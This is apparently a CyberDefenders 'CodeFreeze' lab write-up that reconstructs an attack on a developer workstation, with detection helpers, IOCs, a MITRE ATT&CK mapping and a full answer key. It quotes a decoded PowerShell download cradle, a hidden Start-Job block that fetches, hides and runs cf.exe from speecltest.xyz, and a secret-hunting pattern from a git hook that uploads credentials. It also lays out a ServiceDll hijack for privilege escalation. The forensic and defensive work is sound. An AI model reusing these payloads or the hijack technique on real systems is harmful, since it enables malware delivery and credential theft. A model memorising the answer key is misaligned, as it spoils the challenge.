// CyberDefenders  ·  Endpoint Forensics

CodeFreeze

Platform:   CyberDefenders
Difficulty: Medium
Tools:      Event Viewer, CyberChef, Registry Explorer, Timeline Explorer, PECmd, DB Browser for SQLite
Tactics:    Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion

Scenario

Caspery, a senior developer at Wowza Enterprise, reported that his git commit commands were taking unusually long to complete. Days later, the Threat Intelligence team found Caspery’s credentials and API keys actively traded on a dark web forum. A forensic image of his workstation was acquired for analysis.


Methodology

Initial Access — Social Engineering via Google Meet

Browser history from the Zen Browser profile (places.sqlite) was opened in DB Browser for SQLite. The moz_places table surfaced a Google Meet session (meet.google.com/vqe-xhmi-jtn) followed immediately by a local HTML file being opened from disk:

file:///C:/Users/caspery/wowza/DevCompliance_20260121_200407.html

The HTML file was a convincingly styled “Compliance Report” — an audit score lure generated to make the attack feel legitimate. The filename timestamp (20260121_200407) pinpoints delivery to 2026-01-21 at 20:04. The attacker posed as an auditor during the Google Meet session and instructed Caspery to paste a PowerShell command into his terminal.

Execution — Encoded PowerShell Stager

PSReadLine history (ConsoleHost_history.txt) revealed the stager command mid-session between normal development activity:

powershell.exe -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3...

Decoding the Base64+UTF-16LE blob in CyberChef resolves to:

IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ChickenLoner/486137f8a96668b4e9778ce43458fd2e/raw/4402acda06f89254c4fee1e8bb8a5cef6401745f/Dev-Workstation-Assessment.ps1')
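As an added triage helper (mine, not part of the lab or the original writeup), the Python below reproduces the CyberChef step over a PSReadLine history: it finds -EncodedCommand arguments, decodes Base64 over UTF-16LE, and surfaces download-cradle markers and URLs. The history text is constructed; the cradle string is the decoded command above, and its encoding starts with the same SQBFAFgAIAAoAE4AZQB3 prefix seen in the log.

```python
import base64
import re

# The decoded cradle from the writeup; everything else here is constructed sample data.
CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
          "'https://gist.githubusercontent.com/ChickenLoner/486137f8a96668b4e9778ce43458fd2e"
          "/raw/4402acda06f89254c4fee1e8bb8a5cef6401745f/Dev-Workstation-Assessment.ps1')")

def encode_command(cmd: str) -> str:
    """What -EncodedCommand expects: Base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

def decode_command(blob: str) -> str:
    """Reverse of encode_command; tolerates a blob whose '=' padding was cut off."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")

# Constructed ConsoleHost_history.txt: the stager sits between ordinary git/npm commands.
SAMPLE_HISTORY = "\n".join([
    "git status",
    "git commit -m 'fix lint'",
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + encode_command(CRADLE),
    "npm test",
])

# -e, -ec, -enc and -EncodedCommand are all accepted spellings of the same switch.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download-cradle markers worth surfacing during triage.
CRADLE_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "Net.WebClient")

def triage_history(history: str) -> list[dict]:
    """Return one finding per history line that carries a decodable encoded command."""
    findings = []
    for lineno, line in enumerate(history.splitlines(), 1):
        m = ENC_FLAG.search(line)
        if not m:
            continue
        try:
            decoded = decode_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # matched the flag shape but is not a UTF-16LE Base64 blob
        hits = [k for k in CRADLE_MARKERS if k.lower() in decoded.lower()]
        findings.append({"line": lineno, "decoded": decoded, "cradle_markers": hits,
                         "urls": re.findall(r"https?://[^\s'\"]+", decoded)})
    return findings

if __name__ == "__main__":
    for f in triage_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['cradle_markers']} -> {f['urls']}")
```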

The script (Dev-Workstation-Assessment.ps1) is a fully functional developer compliance checker with a hidden payload module appended at the bottom. The legitimate-looking output — toolchain checks, security hygiene scoring, HTML report generation — provides cover while the malicious section executes silently inside a Start-Job block:

Start-Job -ScriptBlock {
    $url = "http://speecltest.xyz/cf.exe"
    $target = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "6.exe")
    $wc = New-Object System.Net.WebClient
    $wc.DownloadFile($url, $target)
    $f = Get-Item $target -Force; $f.Attributes = "Hidden"
    Start-Process $target -WindowStyle Hidden
} | Out-Null

The binary downloads to C:\Users\caspery\AppData\Local\Temp\6.exe, is immediately hidden, and executed without a window. Reviewing the Gist revision history reveals the attacker originally tested against security-compliance.internal.corp before switching to the live C2 domain speecltest.xyz.

MFT analysis confirmed 6.exe was written to disk at 2026-01-21 13:04:32, matching the PSReadLine timestamp.

Enumeration — Backup Operators Discovery via Injected notepad.exe

With the C2 agent running, the attacker enumerated local security group membership. Windows logs this activity as Security Event ID 4799 (“A security-enabled local group membership was enumerated”), which records the calling process. Filtering Security.evtx for 4799 events after 6.exe executed at 13:04:32 surfaced a cluster at 2026-01-21 13:10:32 that stood apart from the routine SYSTEM-context enumerations:

TargetUserName:    Backup Operators / Users
SubjectUserSid:    S-1-5-21-3347199008-454752828-3392572726-1001 (caspery)
CallerProcessId:   0x201c (8220)
CallerProcessName: C:\Windows\System32\notepad.exe

Every other 4799 event was a benign svchost.exe query running under SYSTEM (S-1-5-18). This one was different — it ran in Caspery’s user context and the caller was notepad.exe, which has no legitimate reason to enumerate group membership. 6.exe had injected into notepad.exe, a quiet always-available process in the user session, and used it to probe the host’s group structure. The enumeration revealed that Caspery’s account belonged to the Backup Operators group, which grants SeBackupPrivilege and SeRestorePrivilege — the ability to read and write any file or registry key on the system regardless of ACLs, without requiring full Administrator rights. That privilege is what made the subsequent service hijack possible.
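An added example (mine, not the lab's tooling) of the 4799 filtering logic just described, run over constructed records shaped like the fields above: SYSTEM-context svchost.exe enumerations are dropped, everything else is kept with its hex CallerProcessId converted to decimal and high-value groups marked. The expected-caller and high-value-group lists are assumptions a team would tune.

```python
SYSTEM_SID = "S-1-5-18"
# Callers whose SYSTEM-context group enumeration is routine on a workstation (assumed baseline).
EXPECTED_CALLERS = {r"c:\windows\system32\svchost.exe"}
# Groups whose membership hands out SeBackup/SeRestore or other high-impact rights.
HIGH_VALUE_GROUPS = {"administrators", "backup operators", "remote desktop users"}

# Constructed 4799 records (not the lab's Security.evtx export); field names match the event.
SAMPLE_4799 = [
    {"time": "2026-01-21 12:58:01", "TargetUserName": "Administrators",
     "SubjectUserSid": "S-1-5-21-3347199008-454752828-3392572726-1001",
     "CallerProcessId": "0x1a4", "CallerProcessName": "C:\\Windows\\explorer.exe"},
    {"time": "2026-01-21 13:05:10", "TargetUserName": "Administrators",
     "SubjectUserSid": "S-1-5-18", "CallerProcessId": "0x3f8",
     "CallerProcessName": "C:\\Windows\\System32\\svchost.exe"},
    {"time": "2026-01-21 13:10:32", "TargetUserName": "Backup Operators",
     "SubjectUserSid": "S-1-5-21-3347199008-454752828-3392572726-1001",
     "CallerProcessId": "0x201c", "CallerProcessName": "C:\\Windows\\System32\\notepad.exe"},
    {"time": "2026-01-21 13:10:32", "TargetUserName": "Users",
     "SubjectUserSid": "S-1-5-21-3347199008-454752828-3392572726-1001",
     "CallerProcessId": "0x201c", "CallerProcessName": "C:\\Windows\\System32\\notepad.exe"},
]

def pid_from_hex(value: str) -> int:
    """4799 records CallerProcessId as hex text (0x201c -> 8220)."""
    return int(value, 16)

def triage_4799(events: list[dict], not_before: str = "") -> list[dict]:
    """Keep enumerations after not_before that are not a SYSTEM-context expected caller."""
    flagged = []
    for ev in events:
        if ev["time"] < not_before:          # ISO timestamps compare lexicographically
            continue
        caller = ev["CallerProcessName"].lower()
        if ev["SubjectUserSid"] == SYSTEM_SID and caller in EXPECTED_CALLERS:
            continue
        flagged.append({
            "time": ev["time"],
            "pid": pid_from_hex(ev["CallerProcessId"]),
            "caller": ev["CallerProcessName"],
            "group": ev["TargetUserName"],
            "high_value": ev["TargetUserName"].lower() in HIGH_VALUE_GROUPS,
        })
    return flagged

def suspicious_callers(events: list[dict], not_before: str = "") -> dict:
    """Collapse flagged events to (caller, pid) pairs with the set of groups each probed."""
    by_proc = {}
    for f in triage_4799(events, not_before):
        by_proc.setdefault((f["caller"], f["pid"]), set()).add(f["group"])
    return by_proc
```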

Privilege Escalation — DLL Hijacking via wisvc

With Backup Operators privileges in hand, the attacker could write to restricted registry paths. MFT analysis filtered for .dll files created after 13:04:32 on 2026-01-21 surfaced a suspicious entry:

C:\ProgramData\AnyDesk\gcapl.dll    Created: 2026-01-21 13:14:50

AnyDesk had been installed on the workstation (confirmed via Edge download history). The legitimate gcapi.dll sits in C:\Program Files (x86)\AnyDesk\ — the attacker named their malicious DLL gcapl.dll (extra l) and dropped it into C:\ProgramData\AnyDesk\ to intercept DLL search order resolution.

Registry Explorer showed that the wisvc (Windows Insider Service) configuration was modified twelve seconds after the DLL was dropped:

HKLM\SYSTEM\ControlSet001\Services\wisvc\Parameters
ServiceDll = C:\ProgramData\AnyDesk\gcapl.dll
LastWrite:  2026-01-21 13:15:02

The wisvc service runs inside the svchost.exe -k netsvcs group under SYSTEM. Modifying its ServiceDll via SeRestorePrivilege required no UAC prompt — a silent privilege escalation path. The attacker then waited for a system reboot.

Post-Reboot — DLL Loads and Persistence Installed

The System event log confirmed the OS restarted at 2026-01-22 11:36 (Kernel power events). Within 90 seconds of boot, MFT showed a log file written by the DLL:

C:\Windows\Temp\wisvc_debug.log    Created: 2026-01-22 11:38:11

The log filename blends into legitimate Windows diagnostics. With SYSTEM privileges now established, the attacker installed a fake monitoring service at 11:46:23:

ServiceName:  System Monitor
ImagePath:    C:\Windows\Sysmon.exe
AccountName:  LocalSystem

This is a direct Sysmon impersonation — identical display name, plausible binary path. To complete the disguise, a fake Sysmon operational event log was dropped at 2026-01-22 11:47:39:

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx

Opening the file reveals an ElfFile header followed entirely by null bytes — a stub to simulate logging history.
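An added check, not from the original writeup, that tells such a stub apart from a real log: it validates the ElfFile magic, reads the chunk count from the 4096-byte file header, and looks for ElfChnk chunk headers in the body. Both inputs are constructed in-memory images; the header offsets are those of the documented EVTX file header.

```python
import struct

EVTX_FILE_MAGIC = b"ElfFile\x00"
EVTX_CHUNK_MAGIC = b"ElfChnk\x00"
FILE_HEADER_SIZE = 4096   # the file header block; chunks start at this offset
CHUNK_SIZE = 65536        # every chunk is 64 KiB

# Constructed stub shaped like the dropped file: ElfFile magic, then nothing but nulls.
STUB_EVTX = EVTX_FILE_MAGIC + b"\x00" * (8192 - len(EVTX_FILE_MAGIC))

def constructed_evtx_with_chunk() -> bytes:
    """Constructed minimal image declaring one chunk, used only to contrast with the stub."""
    hdr = EVTX_FILE_MAGIC + struct.pack("<QQQ", 0, 0, 1)            # first/last chunk, next record id
    hdr += struct.pack("<IHHHH", 128, 1, 3, FILE_HEADER_SIZE, 1)    # hdr size, minor, major, block, chunks
    return hdr.ljust(FILE_HEADER_SIZE, b"\x00") + EVTX_CHUNK_MAGIC.ljust(CHUNK_SIZE, b"\x00")

def inspect_evtx(data: bytes) -> dict:
    """Sanity-check an .evtx image: magic, declared chunk count, chunk magics actually present."""
    result = {"magic_ok": data[:8] == EVTX_FILE_MAGIC, "chunks_declared": None,
              "chunks_found": 0, "null_body": False}
    if not result["magic_ok"] or len(data) < 0x80:
        return result
    # Little-endian header fields after the magic (offsets 8..43).
    first_chunk, last_chunk, next_record = struct.unpack_from("<QQQ", data, 8)
    _hdr_size, minor, major, _block, num_chunks = struct.unpack_from("<IHHHH", data, 32)
    result.update({"chunks_declared": num_chunks, "chunk_range": (first_chunk, last_chunk),
                   "next_record_id": next_record, "version": f"{major}.{minor}"})
    body = data[FILE_HEADER_SIZE:]
    result["null_body"] = bool(body) and not body.strip(b"\x00")
    for off in range(0, len(body) - 7, CHUNK_SIZE):
        if body[off:off + 8] == EVTX_CHUNK_MAGIC:
            result["chunks_found"] += 1
    return result

def is_stub(data: bytes) -> bool:
    """Carries the ElfFile magic but holds no chunk: it never recorded a single event."""
    r = inspect_evtx(data)
    return r["magic_ok"] and r["chunks_found"] == 0
```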

Exfiltration — Git Pre-Commit Hook

At 2026-01-22 12:50:22, the attacker dropped a pre-commit hook into a global hooks directory:

C:\ProgramData\.git-hooks\pre-commit    Created: 2026-01-22 12:50:22

At 13:07, the Git system-wide configuration file was modified to redirect all hook execution to this directory:

C:\Users\caspery\AppData\Local\Programs\Git\etc\gitconfig
core.hooksPath = C:\ProgramData\.git-hooks

This applied globally — every git commit on the machine would now trigger the planted hook. The pre-commit file was subsequently deleted, but bstrings against the pagefile recovered the GitHub URL hosting the exfiltration payload:

https://gist.githubusercontent.com/ChickenLoner/d59b614c1e9ed09edf98500e36ab4361/raw/
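An added audit helper (mine, not code from the lab) that parses a gitconfig file the way Git does and flags a core.hooksPath that points outside the repository; the list of shared, user-writable roots is an assumption to tune per environment. The sample config is constructed to mirror the modified system-wide file above.

```python
import re
from pathlib import PureWindowsPath

# Constructed gitconfig mirroring the modified system-wide file (not the lab's actual file).
SAMPLE_GITCONFIG = """[core]
\tautocrlf = true
\thooksPath = C:\\ProgramData\\.git-hooks
[credential]
\thelper = manager
"""

SECTION = re.compile(r"^\s*\[([^\]\s]+)(?:\s+\"([^\"]*)\")?\]\s*$")   # [core] or [remote "origin"]
KEYVAL = re.compile(r"^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$")

def parse_gitconfig(text: str) -> dict[str, str]:
    """Flatten a gitconfig into {'section.key': value}; Git treats names case-insensitively."""
    out, section = {}, None
    for raw in text.splitlines():
        line = raw.split(";")[0].split("#")[0]     # drop trailing comments
        if not line.strip():
            continue
        m = SECTION.match(line)
        if m:
            section = m.group(1).lower() + (f".{m.group(2)}" if m.group(2) else "")
            continue
        m = KEYVAL.match(line)
        if m and section:
            out[f"{section}.{m.group(1).lower()}"] = m.group(2)
    return out

# Roots any local user can write to without elevation (assumed defaults).
WORLD_WRITABLE_ROOTS = ("c:\\programdata", "c:\\users\\public", "c:\\windows\\temp")

def audit_hooks_path(text: str) -> dict:
    """Flag a core.hooksPath that leaves the repo, worst when it sits in a shared writable dir."""
    cfg = parse_gitconfig(text)
    hp = cfg.get("core.hookspath")
    if hp is None:
        return {"set": False, "suspicious": False, "reason": "core.hooksPath not set"}
    p = PureWindowsPath(hp)
    if p.is_absolute() and str(p).lower().startswith(WORLD_WRITABLE_ROOTS):
        return {"set": True, "suspicious": True, "path": hp,
                "reason": "absolute hooksPath under a shared user-writable directory"}
    if p.is_absolute():
        return {"set": True, "suspicious": True, "path": hp,
                "reason": "absolute hooksPath applies to every repository on the host; review its hooks"}
    return {"set": True, "suspicious": False, "path": hp, "reason": "relative hooksPath inside the repo"}
```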

The script (secret.sh) runs a full credential scan on first execution, then staged-only scans on subsequent commits, hunting for:

password|api[_-]?key|secret|token|aws[_-]?access|private[_-]?key|BEGIN.*PRIVATE.*KEY|DB_PASSWORD|POSTGRES|MYSQL_PASSWORD

A marker file (.git-scanner-init) is written to %USERPROFILE% after the initial full scan to prevent duplicate exfiltration of the complete repository. All collected data is POSTed to:

http://speecltest.xyz/upload

MFT confirmed .git-scanner-init was created at 2026-01-22 13:10:53, timestamping the first execution. Cross-referencing the git log of the webpage repository revealed three commits that triggered the hook after core.hooksPath was set — “delete logs” (13:10:39), “add gitignore” (13:16:28), and “Task scheduler friendly” (13:33:19). The first triggering commit hash: 70c08d68cbec8c04ff967616f306e22a21e9aba0

Caspery’s admin_data.json from the Wowza Enterprise web application (C:\Users\caspery\wowza\wowweb\webpage\admin_data.json) was identified in the Recycle Bin metadata as a deleted file — the credentials and API keys captured from this file are what surfaced on the dark web forum.


Attack Summary

Phase                   Action
Initial Access          Google Meet social engineering — attacker posed as auditor, delivered encoded PowerShell stager
Execution               Dev-Workstation-Assessment.ps1 downloaded from ChickenLoner’s GitHub Gist, hidden payload ran silently via Start-Job
C2 Deployment           cf.exe downloaded from hxxp[://]speecltest[.]xyz/cf.exe, written to Temp as 6.exe, hidden and executed
Enumeration             Security group membership revealed Backup Operators privilege on Caspery’s account
DLL Staging             gcapl.dll dropped to C:\ProgramData\AnyDesk\ masquerading as legitimate gcapi.dll
Privilege Escalation    wisvc ServiceDll modified to load gcapl.dll via SeRestorePrivilege; SYSTEM on next reboot
Persistence             Fake “System Monitor” service installed; fake Sysmon evtx dropped to simulate legitimate logging
Defense Evasion         C:\Windows\Sysmon.exe + null-padded Sysmon%4Operational.evtx deployed to blend into monitoring infrastructure
Collection              Git core.hooksPath redirected to C:\ProgramData\.git-hooks\; secret.sh pre-commit hook scans for credentials on every commit
Exfiltration            Credentials and API keys from admin_data.json POSTed to hxxp[://]speecltest[.]xyz/upload

IOCs

Type                        Value
Meeting ID                  vqe-xhmi-jtn (Google Meet)
URL (Stager)                hxxps[://]gist[.]githubusercontent[.]com/ChickenLoner/486137f8a96668b4e9778ce43458fd2e/raw/
URL (C2 Binary)             hxxp[://]speecltest[.]xyz/cf.exe
URL (Exfil Script)          hxxps[://]gist[.]githubusercontent[.]com/ChickenLoner/d59b614c1e9ed09edf98500e36ab4361/raw/
URL (Exfil Endpoint)        hxxp[://]speecltest[.]xyz/upload
Domain (Test C2)            security-compliance[.]internal[.]corp
File                        C:\Users\caspery\AppData\Local\Temp\6.exe
File                        C:\ProgramData\AnyDesk\gcapl.dll
File                        C:\Windows\Temp\wisvc_debug.log
File                        C:\Windows\Sysmon.exe
File                        C:\ProgramData\.git-hooks\pre-commit
File                        C:\Users\caspery\AppData\Local\Programs\Git\etc\gitconfig
GitHub User                 ChickenLoner
Script                      Dev-Workstation-Assessment.ps1
Script                      secret.sh
Marker File                 .git-scanner-init
Commit Hash (first exfil)   70c08d68cbec8c04ff967616f306e22a21e9aba0

MITRE ATT&CK

ID          Technique
            Description

T1566.003   Phishing: Spearphishing via Service
            Attacker used Google Meet to deliver malicious PowerShell command under auditor pretense
T1204.002   User Execution: Malicious File
            Caspery executed the encoded PowerShell stager believing it was a legitimate audit tool
T1059.001   PowerShell
            Encoded -EncodedCommand stager used to download and execute compliance script
T1105       Ingress Tool Transfer
            cf.exe downloaded from speecltest.xyz to %TEMP%\6.exe
T1055       Process Injection
            C2 agent injected into running process post-execution
T1574.002   Hijack Execution Flow: DLL Side-Loading
            gcapl.dll placed in AnyDesk directory to be loaded by wisvc service
T1543.003   Create or Modify System Process: Windows Service
            wisvc ServiceDll hijacked; fake “System Monitor” service created
T1036.004   Masquerading: Match Legitimate Name or Location
            Sysmon.exe and System Monitor service name used to impersonate Sysinternals Sysmon
T1546       Event Triggered Execution
            Git core.hooksPath redirected globally; pre-commit hook fires on every commit
T1552.001   Unsecured Credentials: Credentials In Files
            secret.sh scanned git history and staged files for API keys and passwords
T1048.003   Exfiltration Over Web Service
            Credentials POSTed to speecltest.xyz/upload via curl in shell script
T1070.004   Indicator Removal: File Deletion
            pre-commit hook, wisvc_debug.log, and other artifacts deleted post-execution

Defender Takeaways

Git global hook path monitoring — The attacker’s entire exfiltration mechanism depended on modifying core.hooksPath in the system-wide gitconfig. Monitoring writes to the Git installation’s etc\gitconfig (here C:\Users\caspery\AppData\Local\Programs\Git\etc\gitconfig; %ProgramFiles%\Git\etc\gitconfig for a machine-wide install) and to any user .gitconfig for hooksPath entries is a high-fidelity detection. SACL auditing on these files costs almost nothing and would have caught this immediately.

Backup Operators is a privileged group — It is frequently overlooked compared to Domain Admins but grants SeBackupPrivilege and SeRestorePrivilege, which allow writing to any registry key and file on the system regardless of ACLs. Developer workstations have no business reason to have users in this group. Regular audits of local group membership, particularly Backup Operators and Remote Desktop Users, should be standard practice.

DLL search order abuse via ProgramData — Writing to C:\ProgramData\<AppName>\ is achievable by any user without elevation on a default Windows install. Applications that load DLLs from ProgramData directories are vulnerable to this technique. Software vendors should use absolute paths for DLL loading, and defenders should monitor for .dll writes to ProgramData subdirectories.

Social engineering targeting developers — The fake compliance audit was convincing precisely because it ran real checks and produced real output. Developer culture of “run this command to check your environment” is a well-understood attack surface. Security awareness training for developers should specifically address unsolicited audit scripts, even from apparent colleagues or authority figures on video calls.

Credential hygiene in git repositories — The exfil script found real secrets in the repository because they were committed in plaintext. Pre-commit hooks designed to prevent secret commits (e.g. detect-secrets, git-secrets) are the correct technical control here — the attacker weaponised the hook mechanism precisely because it runs before the commit is finalised. Combining secret scanning with short-lived API keys and automated rotation limits the blast radius when exfiltration does occur.


Questions

Q: The user suspected that the suspicious activity occurred after executing an "audit" script provided by an individual claiming to be an auditor during a meeting. Identify the meeting ID associated with the threat actor.
A: vqe-xhmi-jtn

Q: During the meeting, the threat actor provided the victim with a malicious command disguised as an "audit" script intended to assess the developer environment. From the full URL hosting the actual script, identify the GitHub username hosting the script and the script's filename.
A: ChickenLoner, Dev-Workstation-Assessment.ps1

Q: Upon inspection of the fake assessment script, an additional C2 URL was identified hosting a malicious binary that was ultimately executed on the system. What is the full URL of this C2 endpoint?
A: http://speecltest.xyz/cf.exe

Q: A previous version of the script reveals another C2 address that was used to test the payload. What domain was identified in that earlier version?
A: security-compliance.internal.corp

Q: Upon execution, the script downloads a binary file and runs it on the system. Identify the full path of the downloaded binary.
A: C:\Users\caspery\AppData\Local\Temp\6.exe

Q: During the enumeration phase, the threat actor enumerated security groups on the system, revealing a process that had been injected by a malicious executable. What is the name of this process and its process ID?
A: notepad.exe, 8220

Q: Security group enumeration revealed that the compromised user belonged to a special privileged group that allows members to back up and restore all files on the system. What is the name of this security group?
A: Backup Operators

Q: To prepare for privilege escalation, the threat actor uploaded a DLL file masquerading as a legitimate DLL used by a remote desktop application installed on the system. What is the name of this file, and when was it created?
A: gcapl.dll, 2026-01-21 13:14

Q: The threat actor abused a special privilege to modify an existing service on the system to load the previously identified DLL. What is the name of this service?
A: wisvc

Q: The threat actor waited for a subsequent system reboot so the modified service could start and load the DLL. Determine the operating system startup time on the following day. What is the timestamp of this OS startup?
A: 2026-01-22 11:36

Q: The DLL also implements logging functionality. Provide the full path of the log file created after the DLL was loaded into the process.
A: C:\Windows\Temp\wisvc_debug.log

Q: After gaining high privileges, the threat actor created a service masquerading as a legitimate system monitoring tool that logs events such as process creation. What is the name of the service?
A: System Monitor

Q: To make the service appear legitimate, the threat actor dropped a fake log file on the system. Provide the timestamp when this log file was created.
A: 2026-01-22 11:47

Q: After identifying that the user was working on multiple projects and using Git for version control, the threat actor created a folder and dropped a file that executes before the user commits changes. What is the full path of this file?
A: C:\ProgramData\.git-hooks\pre-commit

Q: The contents of the previously identified file reveal another script used for data exfiltration. From the full URL hosting this script, identify the GitHub username hosting the script and the script's filename.
A: ChickenLoner, secret.sh

Q: The script uses a specific pattern to identify sensitive data within Git history and the current commit. What is the full pattern?
A: password|api[_-]?key|secret|token|aws[_-]?access|private[_-]?key|BEGIN.*PRIVATE.*KEY|DB_PASSWORD|POSTGRES|MYSQL_PASSWORD

Q: The script creates a marker file to determine whether it has previously executed on the system. What is the name of this file?
A: .git-scanner-init

Q: What is the full URL where the exfiltrated data is uploaded?
A: http://speecltest.xyz/upload

Q: How many times was the script executed on the system, and when was it first downloaded?
A: 3, 2026-01-22 13:10

Q: What is the commit hash of the first commit that caused the script to execute?
A: 70c08d68cbec8c04ff967616f306e22a21e9aba0

Q: To enable execution of the planted script, the threat actor modified Git's behavior. When did this modification occur?
A: 2026-01-22 13:07